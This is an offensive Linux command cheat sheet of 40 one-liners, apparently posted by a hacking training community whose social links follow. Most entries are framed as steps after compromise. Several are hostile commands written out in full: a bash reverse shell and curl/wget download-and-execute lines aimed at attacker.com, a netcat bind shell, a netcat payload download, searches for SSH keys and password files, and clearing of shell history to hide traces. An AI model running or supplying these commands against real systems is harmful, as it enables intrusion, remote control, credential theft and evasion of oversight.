1. Find All SUID Binaries

find / -perm -4000 -type f 2>/dev/null

Identifies SUID binaries that may allow privilege escalation due to misconfiguration.

2. Find World-Writable Files

find / -type f -perm -2 -ls 2>/dev/null

Locates files writable by anyone — often abused for privilege escalation or persistence.

3. List Open Network Ports (netstat)

netstat -tulnp 2>/dev/null

Displays listening services and associated processes on the system.

4. List Open Network Ports (ss)

ss -tulnp

Modern replacement for netstat; faster and commonly available.

5. Discover Live Hosts in a Subnet

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep "64 bytes" & done

Quick host discovery for lateral movement after initial compromise.

6. Download File Without wget/curl

echo "GET /evil.sh HTTP/1.0\r\n" | nc yourhost.com 80 > evil.sh

Downloads files using netcat when standard tools are unavailable.

7. Start a Simple HTTP Server (Python 3)

python3 -m http.server 8000

Hosts payloads or enables quick file exfiltration.

8. Start a Simple HTTP Server (Python 2)

python -m SimpleHTTPServer 8000

Legacy alternative for older systems.

9. Bash Reverse Shell

bash -i >& /dev/tcp/attacker.com/4444 0>&1

Spawns a reverse shell using Bash only — useful in RCE scenarios.

10. Dump All User Crontabs

for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done

Enumerates scheduled tasks that may contain credentials or exploitable scripts.

11. Search for Keywords in Files

grep -Ri 'password' /etc 2>/dev/null

Finds hardcoded secrets such as passwords or API keys.

12. List Running Processes (Full Arguments)

ps auxww

Displays all running processes without truncation — useful for spotting secrets.

13. Extract IP Addresses from a File

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' filename.txt | sort -u

Parses logs or files to extract unique IP addresses.

14. List Listening Services with Executables

lsof -i -P -n | grep LISTEN

Maps listening ports to binaries for service identification.

15. Base64 Encode

echo 'yourstring' | base64

Encodes payloads for obfuscation or transport.

16. Base64 Decode

echo 'b3BlbnNlc2FtZQ==' | base64 -d

Decodes Base64-encoded data during analysis.

17. Find Recently Modified Files

find /tmp -type f -mmin -10 2>/dev/null

Detects recently dropped files — useful for malware or attacker activity.

18. Replace Strings in Multiple Files

find . -type f -exec sed -i 's/oldstring/newstring/g' {} +

Mass-edits configs or payloads quickly.

19. Download and Execute Script in Memory (curl)

curl http://attacker.com/payload.sh | bash

Executes payloads without touching disk.

20. Download and Execute Script in Memory (wget)

wget -qO- http://attacker.com/payload.sh | bash

Alternative in-memory execution method.

21. Find Hidden Files and Directories

find / -name ".*" 2>/dev/null

Reveals hidden files often used to store credentials or flags.

22. View Recent Login Activity

last -a | head -10

Identifies active users and login patterns.

23. List Environment Variables

env

Displays environment variables that may contain secrets.

24. Dump Environment Variables to File

env > /tmp/envdump.txt

Stores environment data for offline analysis.

25. Netcat Bind Shell

nc -lvnp 4444 -e /bin/bash

Creates a listening shell for lateral movement.

26. Get Internal IP Address

hostname -I

Quickly identifies local network addresses.

27. Enumerate Network Interfaces

ip addr show | grep 'inet ' | awk '{print $2}'

Alternative method to list assigned IPs.

28. Check Sudo Privileges

sudo -l

Shows commands the current user can run as root.

29. Search for SSH Private Keys

find /home -name "id_rsa*" 2>/dev/null

Locates SSH keys for lateral movement or persistence.

30. Find World-Readable Password Files

find / -type f -name "*pass*" -perm -o=r 2>/dev/null

Finds readable files likely containing credentials.

31. Identify UID 0 Users

awk -F: '($3 == "0") {print $1}' /etc/passwd

Detects additional root-level accounts.

32. Download and Extract Zip in One Line

curl -sL http://attacker.com/payload.zip | funzip > payload.sh

Streams and extracts payloads efficiently.

33. List Largest Files

find / -type f -exec du -h {} + | sort -rh | head -20

Identifies large files — possible data dumps or logs.

34. Directory Bruteforce Without Tools

for word in $(cat wordlist.txt); do curl -s -o /dev/null -w "%{http_code} %{url_effective}\n" http://target/$word; done

Finds hidden directories when gobuster is unavailable.

35. List USB Devices

lsusb

Identifies connected USB devices (forensics or exfil checks).

36. Get Quick System Information

uname -a; uptime; cat /etc/os-release

Collects kernel, uptime, and OS details for exploit matching.

37. Check Logged-In Users

who

Shows currently logged-in users.

38. Find Writable Directories

find / -type d -perm -2 -ls 2>/dev/null

Locates directories suitable for payload drops.

39. List Services with systemd

systemctl list-units --type=service

Enumerates active services on systemd-based systems.

40. Clear Bash History

history -c && history -w && unset HISTFILE

Attempts to remove command history and reduce traces.

keep update yourself always

আমাদের কমিউনিটির সকল অফিসিয়াল একাউন্টের লিংক:

Facebook group : https://www.facebook.com/share/g/97BPHjjVqcvYjDLb/?mibextid=A7sQZp

Facebook Page: https://www.facebook.com/share/19yLuQv3i3/

Youtube : https://youtube.com/@h4k2liv3

Whatsapp : https://whatsapp.com/channel/0029ValXkvl8V0tnKJzt6e0f

Discord Server : https://discord.gg/zyrDWRqgM2

LinkedIn Page: https://www.linkedin.com/company/h4k2liv3-academy/

Telegram Channel : t.me/h4k2liv3

H4K2LIV3 Student Registration Form link: https://forms.gle/3nwp366AC7N8LoWi8

Our Roadmap Link : https://docs.google.com/.../1Q6uG1dhg2X3hIyeBXvSF.../edit...